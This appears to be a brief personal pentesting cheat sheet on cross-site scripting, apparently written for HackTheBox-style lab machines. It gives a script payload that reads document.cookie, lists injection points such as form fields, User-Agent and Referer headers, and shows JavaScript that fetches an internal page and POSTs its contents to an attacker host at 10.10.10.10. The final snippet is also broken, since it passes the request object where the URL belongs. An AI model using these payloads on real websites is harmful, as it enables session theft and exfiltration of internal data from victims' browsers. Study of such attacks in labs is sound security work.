XSS

Cross-Site Scripting is a web attack in which the attacker might be able to inject the malicious javascript code for the benefit of the attacker

Stealing cookies of the current user

<script>alert(document.cookie)</script>

Places to check for XSS

• All fields in the form submission

• User-Agent

• Referrer Headers

XSS to CSRF

• Create requests with XMLHTTPRequest() to request a webpage

var url1 = "http://internal.dnoscp.htb";
var req1 = new XMLHttpRequest();
req1.open("GET", url1, false); // open(<request method>, <target url>, <go to next withoput completing this line>)
req1.send();
var resp1 = req1.responseText;

• With the content of the requested webpage stored in the variable resp1, it can be sent to the attacker with another request from js to the attacker machine

var url2 = "http://10.10.10.10";
var req2 = new XMLHttpRequest();
req2.open("POST", req2, false);
req2.send(resp1);